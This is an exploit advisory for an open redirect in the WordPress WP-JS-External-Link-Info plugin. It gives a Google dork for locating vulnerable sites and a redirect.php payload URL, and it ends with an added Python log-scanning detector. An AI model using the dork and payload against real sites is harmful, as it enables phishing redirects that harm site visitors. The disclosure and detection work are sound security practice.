WordPress WP-JS-External-Link-Info plugin version 2.2.0 suffers from an open redirection vulnerability.
####################################################################
# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : finewebdev.com
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
# Software Information Link : wordpress.org/plugins/wp-external-links/
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
WP External Links (nofollow new tab seo) is open source software.
Manage external and internal links on your site.
####################################################################
# Impact :
***********
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
because the application fails to properly verify user-supplied input.
Exploiting this issue may allow attackers to redirect users to arbitrary web sites
and conduct phishing attacks; other attacks are also possible.
WordPress Plugin WP Js External Link Info versions 1.21 - 1.81 and 2.2.0 are
vulnerable; prior versions may also be affected.
####################################################################
# Open Redirection Exploit :
*************************
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
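# Detection example (added here; not part of the original advisory or the plugin's code) :
A Python check that scans web-server access logs for requests to the redirect.php path above whose url parameter leads off-site. The combined log format, the site host blog.example.org and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter name come from the advisory; the regex pulls the
# request target out of a combined-format access log line (assumed format).
REDIRECT_PATH = "/wp-content/plugins/wp-js-external-link-info/redirect.php"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IPs and hosts), not real traffic.
_PREFIX = '203.0.113.7 - - [14/Feb/2019:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    _PREFIX + REDIRECT_PATH + '?url=https://offsite.example/login HTTP/1.1" 200 512',
    _PREFIX + REDIRECT_PATH + '?url=https%3A%2F%2Fblog.example.org%2Fabout HTTP/1.1" 200 512',
    _PREFIX + REDIRECT_PATH + '?url=%2F%2Foffsite.example%2F HTTP/1.1" 200 512',
    _PREFIX + '/index.php?url=https://offsite.example/ HTTP/1.1" 200 512',
]


def offsite_host(target, site_hosts):
    """Return the host a redirect target leads to if it is off-site, else None."""
    # Browsers read backslashes as slashes and drop tabs/newlines; mirror that.
    cleaned = re.sub(r"[\t\r\n]", "", target).strip().replace("\\", "/")
    try:
        host = (urlsplit(cleaned).hostname or "").lower().rstrip(".")
    except ValueError:              # malformed authority: surface it for review
        return "(unparseable)"
    if not host:                    # relative path, stays on the site
        return None
    return None if host in site_hosts else host


def find_offsite_redirects(log_lines, site_hosts):
    """Return (line_number, host) for redirect.php hits whose url leaves the site."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        path, _, query = (match.group(1) if match else "").partition("?")
        if unquote(path).lower() != REDIRECT_PATH:
            continue
        # parse_qs percent-decodes, so url=https%3A%2F%2F... is covered too.
        for value in parse_qs(query).get("url", []):
            host = offsite_host(value, site_hosts)
            if host:
                hits.append((number, host))
    return hits


if __name__ == "__main__":
    for number, host in find_offsite_redirects(SAMPLE_LOG, {"blog.example.org"}):
        print(f"line {number}: redirect.php request points at off-site host {host}")
```

The same offsite_host comparison, applied as an allowlist before a redirect is issued, is the input verification the Impact section says is missing.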